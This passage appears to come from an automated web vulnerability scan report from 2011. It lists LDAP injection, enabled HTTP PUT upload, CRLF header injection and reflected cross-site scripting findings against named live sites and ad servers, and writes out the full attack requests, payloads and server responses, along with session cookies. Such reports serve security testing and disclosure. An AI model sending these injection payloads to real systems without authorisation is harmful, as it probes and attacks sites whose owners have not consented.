                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/business/economy/obama-slams-oil-company-profits-as-gas-prices-surge/2011/04/29/AFPhwyGF_story.html">Obama slams oil company profits as gas prices surge</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the-relentless-smear-campaign-against-obama/2011/04/29/AFkSVyGF_story.html">The relentless smear campaign against Obama</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/birthers-buffoonery-and-a-sad-discourse/2011/04/29/AFdnwyGF_story.html">Birthers, buffoonery and a sad discourse</a>
               </li>
           <li>
                   <a href="http://live.washingtonpost.com/white-house-correspondents-dinner-2011-recap.html">2011 White House Correspondents Dinner: A recap - 2011 White House Correspondents</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the_obama_doctrine_leading_from_behind/201
...[SNIP]...

4.3. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnavLogo.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /wp-srv/ssi/globalnav/js/channelnavLogo.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/ssi/globalnav/js/channelnavLogo.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: edf9973f-dbc0-444a-90a1-fdb5e628ed9c
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=120
Date: Sun, 01 May 2011 23:33:21 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/business/economy/obama-slams-oil-company-profits-as-gas-prices-surge/2011/04/29/AFPhwyGF_story.html">Obama slams oil company profits as gas prices surge</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the-relentless-smear-campaign-against-obama/2011/04/29/AFkSVyGF_story.html">The relentless smear campaign against Obama</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/birthers-buffoonery-and-a-sad-discourse/2011/04/29/AFdnwyGF_story.html">Birthers, buffoonery and a sad discourse</a>
               </li>
           <li>
                   <a href="http://live.washingtonpost.com/white-house-correspondents-dinner-2011-recap.html">2011 White House Correspondents Dinner: A recap - 2011 White House Correspondents</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the_obama_doctrine_leading_from_behind/201
...[SNIP]...

Request 2

GET /*)!(sn=*/ssi/globalnav/js/channelnavLogo.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: f9bc6c41-6fd2-481e-b2a1-0a475f93cc95
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=119
Date: Sun, 01 May 2011 23:33:21 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/business/economy/running-in-the-red-how-the-us-on-the-road-to-surplus-detoured-to-massive-debt/2011/04/28/AFFU7rNF_story.html">Running in the red: How the U.S., on the road to surplus, detoured to massive debt</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/sports/redskins/nfl-draft-2011-redskins-add-nine-more-draft-picks-for-a-total-of-12/2011/04/30/AFTZo7NF_story.html">NFL draft 2011: Redskins add nine more draft picks for a total of 12</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/local/tornado-tally-at-19-for-maryland-and-virginia/2011/04/30/AFySjwOF_story.html">Tornado tally at 19 for Maryland and Virginia</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/world/libya-frontline-turns-quiet-as-rebels-regroup/2011/04/29/AFEwjwNF_story.html">Libya front line turns quiet as rebels regroup</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a
...[SNIP]...

5. HTTP PUT enabled
There are 2 instances of this issue:


5.1. http://www.onlinemicrofiche.com/favicon.ico

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onlinemicrofiche.com
Path:   /favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /1a950014e4506089.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /1a950014e4506089.txt HTTP/1.0
Host: www.onlinemicrofiche.com
Content-Length: 16

e5dcc84f7b5a59c8

Response 1

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 00:38:02 GMT
Location: http://www.onlinemicrofiche.com/1a950014e4506089.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /1a950014e4506089.txt HTTP/1.0
Host: www.onlinemicrofiche.com

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 00:38:02 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 02 May 2011 00:38:02 GMT
ETag: W/"da9f931618cc1:dc0"
Content-Length: 16

e5dcc84f7b5a59c8

5.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Viewcart.asp

Issue detail

HTTP PUT is enabled on the web server. The file /29ed5e51742981e7.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /29ed5e51742981e7.txt HTTP/1.0
Host: www.onlinemicrofiche.com
Content-Length: 16

8562c216a2d852a8

Response 1

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:43 GMT
Location: https://www.onlinemicrofiche.com/29ed5e51742981e7.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /29ed5e51742981e7.txt HTTP/1.0
Host: www.onlinemicrofiche.com

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:43 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 02 May 2011 03:19:43 GMT
ETag: W/"b8cdb9c7778cc1:dd2"
Content-Length: 16

8562c216a2d852a8

6. HTTP header injection
There are 6 instances of this issue:


6.1. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 527ab%0d%0a3565611b9b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /527ab%0d%0a3565611b9b4/N3382.Yahoo/B5116950.16;sz=150x30;pc=[TPAS_ID];click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha25jZmtCTDgzNVFtUmduUSxyJDAscmQkMTZpZmY1MGZtKSk/1/*http://global.ard.yahoo.com/SIG=15g2ds2nv/M=999999.999999.999999.999999/D=news/S=96654906:FB/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=iFueFUwN7y4-/J=1304292783275135/K=mbmuBMnyuFXFamzNMr12dQ/A=2394450929415713467/R=0/X=6/*;dcopt=rcl;mtfIFPath=nofile;ord=1304292783.275135? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/527ab
3565611b9b4
/N3382.Yahoo/B5116950.16;sz=150x30;pc=[TPAS_ID];click=http: //clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha2
Date: Sun, 01 May 2011 23:34:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

6.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 83f32%0d%0a81dda35bbd7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /83f32%0d%0a81dda35bbd7/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/83f32
81dda35bbd7
/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http: //googleads.g.doubleclick.net/aclk
Date: Mon, 02 May 2011 02:29:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

6.3. http://ad.doubleclick.net/adj/wpni.jobs/front [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.jobs/front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 889bb%0d%0ac948c2d7ba2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /889bb%0d%0ac948c2d7ba2/wpni.jobs/front;sz=728x90;pos=ad1;poe=yes;ad=lb;del=js;ajax=n;dcopt=ist;ad=interstitial;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;front=n;tile=1;ord=29166153864935040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/889bb
c948c2d7ba2
/wpni.jobs/front;sz=728x90;pos=ad1;poe=yes;ad=lb;del=js;ajax=n;dcopt=ist;ad=interstitial;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;front=n;tile=1;ord=29166153864935040:
Date: Sun, 01 May 2011 23:36:00 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

6.4. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The value of REST URL parameter 2 is copied into the location response header. The payload 81751%0d%0a4daf40cbe6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /n/81751%0d%0a4daf40cbe6/71938/EI6/x/e?value=0&trans=&domain=na.decdna.net HTTP/1.1
Host: na.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:39:12 GMT
Server: Apache/2.2.3 (Red Hat)
Pragma: no-cache
Expires: Sun, 01 May 2011 23:39:12 GMT
location: http://dna1.mookie1.com/n/81751
4daf40cbe6
/71938/EI6/x/e?value=0&trans=&domain=na.decdna.net?0&value=0&trans=&domain=na.decdna.net&redirected
Content-Length: 0
Content-Type: text/plain


6.5. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload a58b5%0d%0aa827e2ca2c6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /n/61239/71938/a58b5%0d%0aa827e2ca2c6/x/e?value=0&trans=&domain=na.decdna.net HTTP/1.1
Host: na.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:40:30 GMT
Server: Apache/2.2.3 (Red Hat)
Pragma: no-cache
Expires: Sun, 01 May 2011 23:40:30 GMT
location: http://dna1.mookie1.com/n/61239/71938/a58b5
a827e2ca2c6
/x/e?0&value=0&trans=&domain=na.decdna.net&redirected
Content-Length: 0
Content-Type: text/plain


6.6. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The value of REST URL parameter 5 is copied into the location response header. The payload 80700%0d%0af0193fdb2e3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /n/61239/71938/EI6/80700%0d%0af0193fdb2e3/e?value=0&trans=&domain=na.decdna.net HTTP/1.1
Host: na.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:41:09 GMT
Server: Apache/2.2.3 (Red Hat)
Pragma: no-cache
Expires: Sun, 01 May 2011 23:41:09 GMT
location: http://dna1.mookie1.com/n/61239/71938/EI6/80700
f0193fdb2e3
/e?0&value=0&trans=&domain=na.decdna.net&redirected
Content-Length: 0
Content-Type: text/plain


7. Cross-site scripting (reflected)
There are 151 instances of this issue:


7.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9596"-alert(1)-"aec72338c29 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=f9596"-alert(1)-"aec72338c29 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7829
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 02:28:57 GMT
Expires: Mon, 02 May 2011 02:28:57 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Mvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=f9596"-alert(1)-"aec72338c29http://www.tdameritrade.com/offer/250freetrades/?a=NVX&o=199&cid=GENRET;877237;62578498;239944784;41336049");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";

...[SNIP]...

7.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a68d"-alert(1)-"b83921a49ea was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

